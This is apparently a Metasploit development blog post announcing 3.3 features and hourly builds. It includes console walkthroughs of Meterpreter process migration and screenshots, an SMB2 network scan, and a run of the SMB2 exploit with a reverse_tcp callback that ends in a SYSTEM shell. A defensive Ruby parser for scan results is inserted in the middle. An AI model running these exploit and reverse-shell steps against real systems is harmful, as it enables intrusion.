Metasploit 3.3 Development Updates

~ Posted by Joe2010 | Tagged with | 3 Comments

The last 48 hours have been a whirlwind of development at the Metasploit Project as we prepare for the 3.3 stable release. Efrain Torres completed the screenshot feature of the espia Meterpreter module. This command only works when the process that Meterpreter is running inside has access to the active desktop (like explorer.exe). You can see an example of this below:


meterpreter > ps

Process list
============

PID   Name          Path
---   ----          ----
204   iexplore.exe  C:\Program Files\Internet Explorer\iexplore.exe
[ snipped ]
1736  Explorer.EXE  C:\WINDOWS\Explorer.EXE
3348  sol.exe       C:\WINDOWS\system32\sol.exe

meterpreter > migrate 1736
[*] Migrating to 1736...
[*] Migration completed successfully.

meterpreter > screenshot /tmp/boom.bmp
[*] Image saved to /tmp/boom.bmp
Opening browser to image.





This morning Stephen Fewer released his long-awaited SMB2 code execution module for the Metasploit Framework. He plans to publish a whitepaper in the near future that discusses the exploit technique and the newly written Vista/2008 ring0 to ring3 stager code. This module is available in the 3.3-dev tree and supports Vista SP1/SP2 and 2008 SP1/SP2 (but not R2) with the same offsets and addresses. Keep in mind that the best workaround for this still-unpatched flaw is to disable the SMB2 protocol. The auxiliary module "auxiliary/scanner/smb/smb2" can be used to scan the network for systems that still have SMB2 enabled (shown below):


msf> use auxiliary/scanner/smb/smb2
msf (auxiliary/smb2) > set RHOSTS 192.168.0.0/24
msf (auxiliary/smb2) > set THREADS 100
msf (auxiliary/smb2) > run


[*] 192.168.0.142 supports SMB 2 [dialect 2.2] and has been online for 54 hours
[*] 192.168.0.211 supports SMB 2 [dialect 2.2] and has been online for 53 hours


When using Metasploit on Windows XP, socket restrictions prevent scanners from working at their full speed. We recommend using anything but XP (2000, Vista, 7) if you need to use the scanning modules inside Metasploit on Windows. Alternatively, boot the BackTrack4 Virtual Machine in VMware.


Now that we have identified two systems with SMB2 enabled, it's exploit time!


msf> use exploit/windows/smb/smb2_negotiate_func_index
msf (exploit/smb2) > set PAYLOAD windows/meterpreter/reverse_tcp
msf (exploit/smb2) > set LHOST 192.168.0.136
msf (exploit/smb2) > set LPORT 5678
msf (exploit/smb2) > set RHOST 192.168.0.211
msf (exploit/smb2) > exploit


[*] Started reverse handler
[*] Connecting to the target (192.168.0.211:445)...
[*] Sending the exploit packet (854 bytes)...
[*] Waiting up to 180 seconds for exploit to trigger...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 2 opened (192.168.0.136:5678 -> 192.168.0.211:49158)


meterpreter > sysinfo
Computer: WIN-UAKGQGDWLX2
OS : Windows 2008 (Build 6001, Service Pack 1).
Arch : x86
Language: en_US


meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM


Voila! A great way to justify disabling SMB2 across your network.
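To track that workaround across a network, the scanner output shown earlier can be turned into a before/after comparison. This is an added example, not part of the original post or of Metasploit itself; it assumes the console output was saved as text, and the function names and the second scan are constructed for illustration.

```ruby
require 'ipaddr'

# Result-line format of the smb2 scanner, as it appears in the post's output.
SMB2_LINE = /\A\[\*\] (\S+) supports SMB 2 \[dialect ([\d.]+)\] and has been online for (\d+) hours\z/

Smb2Host = Struct.new(:ip, :dialect, :uptime_hours)

# Extract SMB2-enabled hosts from saved console output. Prompts, blank lines
# and lines with an unparsable address are skipped; re-sightings overwrite.
def parse_smb2_scan(text)
  hosts = {}
  text.each_line do |line|
    m = SMB2_LINE.match(line.strip)
    next unless m
    begin
      ip = IPAddr.new(m[1])
    rescue IPAddr::Error
      next
    end
    hosts[ip.to_s] = Smb2Host.new(ip.to_s, m[2], m[3].to_i)
  end
  hosts.values.sort_by { |h| IPAddr.new(h.ip).to_i }
end

# Compare the scan taken before the workaround with one taken after it.
def remediation_status(before, after)
  b = before.map(&:ip)
  a = after.map(&:ip)
  { still_enabled: b & a, disabled: b - a, newly_seen: a - b }
end

# First scan: the two result lines from the post.
BEFORE_SCAN = <<~LOG
  msf (auxiliary/smb2) > run
  [*] 192.168.0.142 supports SMB 2 [dialect 2.2] and has been online for 54 hours
  [*] 192.168.0.211 supports SMB 2 [dialect 2.2] and has been online for 53 hours
LOG

# Second scan: constructed sample, including one malformed address.
AFTER_SCAN = <<~LOG
  [*] 192.168.0.211 supports SMB 2 [dialect 2.2] and has been online for 77 hours
  [*] 999.168.0.5 supports SMB 2 [dialect 2.2] and has been online for 1 hours
LOG

status = remediation_status(parse_smb2_scan(BEFORE_SCAN), parse_smb2_scan(AFTER_SCAN))
status.each { |state, ips| puts "#{state}: #{ips.join(', ')}" }
```

Hosts listed under still_enabled answered the SMB2 probe in both scans and still need the workaround applied.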


Next item of interest -- we are now generating hourly builds of the 3.3-dev tree and making these available for download from the Metasploit web site. These come in two flavors and two sizes. We are offering the 3.3-dev package for Unix systems in both Full and Mini versions. The Mini version removes the SVN directories, many of the development source files, and the msfweb/msfgui interfaces.


For the first time, we are offering 3.3-dev packages for Windows (based on Cygwin 1.7 [HEAD]), also in Full and Mini versions. The Windows installer is lightweight and can be installed alongside an existing version of Metasploit. The Windows version can be installed to a USB key and made portable, just by specifying the proper path during the install. Finally, the Windows installer can be made to run in batch mode with a command line like the following:


C:\> framework-3.3-dev-mini.exe /S /D=C:\metasploit33dev


We would like to make sure everyone is aware of the freely-available Metasploit Unleashed Online Course developed by the Offensive Security team. The Metasploit Project is currently working with the team to expand the breadth and depth of this online course, with help from our own official Metasploit courseware. This course should continue to improve at a rapid rate over the next few months.





